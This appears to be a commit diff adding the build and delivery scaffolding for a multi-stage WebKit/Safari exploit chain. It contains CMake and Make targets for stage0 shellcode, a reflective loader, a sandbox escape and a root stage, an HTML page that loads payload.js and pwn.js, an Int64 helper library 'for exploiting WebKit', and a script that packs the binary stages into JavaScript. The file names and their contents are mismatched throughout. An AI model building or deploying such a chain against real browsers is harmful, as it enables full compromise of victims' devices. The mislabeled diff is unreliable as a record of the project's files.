Release

Author: insuyun

.gitignore

@@ -0,0 +1,4 @@
+/stage0.bin
+/payload.js
+*.dSYM
+

CMakeLists.txt

@@ -0,0 +1,17 @@
+cmake_minimum_required(VERSION 3.11)
+set(CMAKE_CXX_STANDARD 17)
+
+project(chain)
+
+add_subdirectory(payload/loader/reflective)
+
+# stage 1
+add_subdirectory(payload/sbx)
+# stage 2
+add_subdirectory(payload/root)
+
+add_custom_target(payload.js ALL DEPENDS sbx stage0
+	COMMAND python3 ${PROJECT_SOURCE_DIR}/make.py)
+
+add_custom_target(stage0 ALL
+	COMMAND nasm ${PROJECT_SOURCE_DIR}/payload/stage0.asm -o stage0)

Makefile

@@ -0,0 +1,14 @@
+all: stage0.bin
+	make -C payload/loader
+	make -C payload/sbx
+	./make.py
+
+stage0.bin: payload/stage0.asm
+	nasm -o $@ $<
+
+clean:
+	rm -f stage0.bin payload.js
+	make clean -C payload/loader
+	make clean -C payload/sbx
+
+.PHONY: all clean

README.md

@@ -0,0 +1,28 @@
+<html>
+	<head>
+		<link rel="shortcut icon" href="#">
+		<link rel="icon" href="#">
+		<style>
+			body {
+				margin: 0;
+			}
+			iframe {
+				/*display: none;*/
+			}
+		</style>
+	</head>
+	<body>
+    <iframe id=frame width=10% height=10% src="tuto.pdf"></iframe>
+    <div id=logs></div>
+
+    <script>
+    	document.write(`
+	<script src="payload.js?${Math.random()}"><\/script>
+    <script src="ready.js"><\/script>
+    <script src="logging.js"><\/script>
+	<script src="utils.js"><\/script>
+	<script src="int64.js"><\/script>
+	<script src="pwn.js?${Math.random()}"><\/script>`)
+    </script>
+	</body>
+</html>

exploit.html

@@ -0,0 +1,243 @@
+//
+// Tiny module that provides big (64bit) integers.
+//
+// Copyright (c) 2016 Samuel Groß
+//
+// Requires utils.js
+//
+
+// Datatype to represent 64-bit integers.
+//
+// Internally, the integer is stored as a Uint8Array in little endian byte order.
+function Int64(v) {
+    // The underlying byte array.
+    var bytes = new Uint8Array(8);
+    this.bytes = bytes;
+
+    switch (typeof v) {
+        case 'number':
+            v = '0x' + Math.floor(v).toString(16);
+        case 'string':
+            if (v.startsWith('0x'))
+                v = v.substr(2);
+            if (v.length % 2 == 1)
+                v = '0' + v;
+
+            var bigEndian = unhexlify(v, 8);
+            bytes.set(Array.from(bigEndian).reverse());
+            break;
+        case 'object':
+            if (v instanceof Int64) {
+                bytes.set(v.getBytes());
+            } else {
+                if (v.length != 8)
+                    throw TypeError("Array must have excactly 8 elements.");
+                bytes.set(v);
+            }
+            break;
+        case 'undefined':
+            break;
+        default:
+            throw TypeError("Int64 constructor requires an argument.");
+    }
+
+    // Return a double whith the same underlying bit representation.
+    this.asDouble = function() {
+        // Check for NaN
+        if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
+            throw new RangeError("Integer can not be represented by a double");
+
+        return Struct.unpack(Struct.float64, bytes);
+    };
+
+    // Return a javascript value with the same underlying bit representation.
+    // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
+    // due to double conversion constraints.
+    this.asJSValue = function() {
+        if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
+            throw new RangeError("Integer can not be represented by a JSValue");
+
+        // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
+        this.assignSub(this, 0x1000000000000);
+        var res = Struct.unpack(Struct.float64, bytes);
+        this.assignAdd(this, 0x1000000000000);
+
+        return res;
+    };
+
+    // Return the underlying bytes of this number as array.
+    this.getBytes = function() {
+        return Array.from(bytes);
+    };
+
+    // Return the byte at the given index.
+    this.byteAt = function(i) {
+        return bytes[i];
+    };
+
+    // Return the value of this number as unsigned hex string.
+    this.toString = function() {
+        return '0x' + hexlify(Array.from(bytes).reverse());
+    };
+    
+    this.asInt32 = function() {
+        var value = new Int64(0);
+        for (var i = 0; i < 8; i++) {
+            if (i < 4) {
+                value.bytes[i] = this.bytes[i];
+            } else {
+                value.bytes[i] = 0;
+            }
+        }
+        
+        return parseInt('0x' + hexlify(Array.from(value.bytes).reverse()).slice(-8));
+    };
+    
+    this.asInt16 = function() {
+        var value = new Int64(0);
+        for (var i = 0; i < 8; i++) {
+            if (i < 2) {
+                value.bytes[i] = this.bytes[i];
+            } else {
+                value.bytes[i] = 0;
+            }
+        }
+        
+        return parseInt('0x' + hexlify(Array.from(value.bytes).reverse()).slice(-8));
+    };
+
+    // Basic arithmetic.
+    // These functions assign the result of the computation to their 'this' object.
+
+    // Decorator for Int64 instance operations. Takes care
+    // of converting arguments to Int64 instances if required.
+    function operation(f, nargs) {
+        return function() {
+            if (arguments.length != nargs)
+                throw Error("Not enough arguments for function " + f.name);
+            for (var i = 0; i < arguments.length; i++)
+                if (!(arguments[i] instanceof Int64))
+                    arguments[i] = new Int64(arguments[i]);
+            return f.apply(this, arguments);
+        };
+    }
+
+    // this = -n (two's complement)
+    this.assignNeg = operation(function neg(n) {
+        for (var i = 0; i < 8; i++)
+            bytes[i] = ~n.byteAt(i);
+
+        return this.assignAdd(this, Int64.One);
+    }, 1);
+
+    // this = a + b
+    this.assignAdd = operation(function add(a, b) {
+        var carry = 0;
+        for (var i = 0; i < 8; i++) {
+            var cur = a.byteAt(i) + b.byteAt(i) + carry;
+            carry = cur > 0xff | 0;
+            bytes[i] = cur;
+        }
+        return this;
+    }, 2);
+
+    // this = a - b
+    this.assignSub = operation(function sub(a, b) {
+        var carry = 0;
+        for (var i = 0; i < 8; i++) {
+            var cur = a.byteAt(i) - b.byteAt(i) - carry;
+            carry = cur < 0 | 0;
+            bytes[i] = cur;
+        }
+        return this;
+    }, 2);
+
+    // this = a ^ b
+    this.assignXor = operation(function xor(a, b) {
+        for (var i = 0; i < 8; i++) {
+            bytes[i] = a.byteAt(i) ^ b.byteAt(i);
+        }
+        return this;
+    }, 2);
+    
+    // this = a & b
+    this.assignAnd = operation(function and(a, b) {
+        for (var i = 0; i < 8; i++) {
+            bytes[i] = a.byteAt(i) & b.byteAt(i);
+        }
+        return this;
+    }, 2);
+    
+    // this = a << b
+    this.assignShiftLeft = operation(function shiftLeft(a, b) {
+        for (var i = 0; i < 8; i++) {
+            if (i < b) {
+                bytes[i] = 0;
+            } else {
+                bytes[i] = a.byteAt(Sub(i, b).asInt32());
+            }
+        }
+        return this;
+    }, 2);
+    
+    // this = a >> b
+    this.assignShiftRight = operation(function shiftRight(a, b) {
+        for (var i = 0; i < 8; i++) {
+            if (i < (8 - b)) {
+                bytes[i] = a.byteAt(Add(i, b).asInt32());
+            } else {
+                bytes[i] = 0;
+            }
+        }
+        return this;
+    }, 2);
+}
+
+// Constructs a new Int64 instance with the same bit representation as the provided double.
+Int64.fromDouble = function(d) {
+    var bytes = Struct.pack(Struct.float64, d);
+    return new Int64(bytes);
+};
+
+// Convenience functions. These allocate a new Int64 to hold the result.
+
+// Return -n (two's complement)
+function Neg(n) {
+    return (new Int64()).assignNeg(n);
+}
+
+// Return a + b
+function Add(a, b) {
+    return (new Int64()).assignAdd(a, b);
+}
+
+// Return a - b
+function Sub(a, b) {
+    return (new Int64()).assignSub(a, b);
+}
+
+// Return a ^ b
+function Xor(a, b) {
+    return (new Int64()).assignXor(a, b);
+}
+
+// Return a & b
+function And(a, b) {
+    return (new Int64()).assignAnd(a, b);
+}
+
+// Return a << b
+function ShiftLeft(a, b) {
+    return (new Int64()).assignShiftLeft(a, b);
+}
+
+// Return a >> b
+function ShiftRight(a, b) {
+    return (new Int64()).assignShiftRight(a, b);
+}
+
+// Some commonly used numbers.
+Int64.Zero = new Int64(0);
+Int64.One = new Int64(1);
+
+// That's all the arithmetic we need for exploiting WebKit.. :)

int64.js

@@ -0,0 +1,7 @@
+print = function(msg) {
+  var logs = document.getElementById('logs');
+  var t = document.createTextNode(msg);
+  logs.appendChild(t);
+  var br = document.createElement('br');
+  logs.appendChild(br);
+}

logging.js

@@ -0,0 +1,38 @@
+#!/usr/bin/env python3
+import os
+import subprocess
+
+with open('payload/sbx/sbx', 'rb') as f:
+    stage2 = f.read()
+
+with open('payload/loader/loader.bin', 'rb') as f:
+    stage1 = f.read()
+
+with open('stage0.bin', 'rb') as f:
+    stage0 = f.read()
+
+def js_repr(_b):
+    return ', '.join(map(hex, map(int, _b)))
+
+output = '''
+const stage0 = [
+    %s
+];
+const stage1 = [
+    %s
+];
+const stage2 = [
+    %s
+];
+
+stage1Arr = new Uint8Array(stage1);
+stage2Arr = new Uint8Array(stage2);
+''' % (
+    js_repr(stage0),
+    js_repr(stage1),
+    js_repr(stage2),
+)
+output = output[1:]
+
+with open('payload.js', 'w') as f:
+    f.write(output)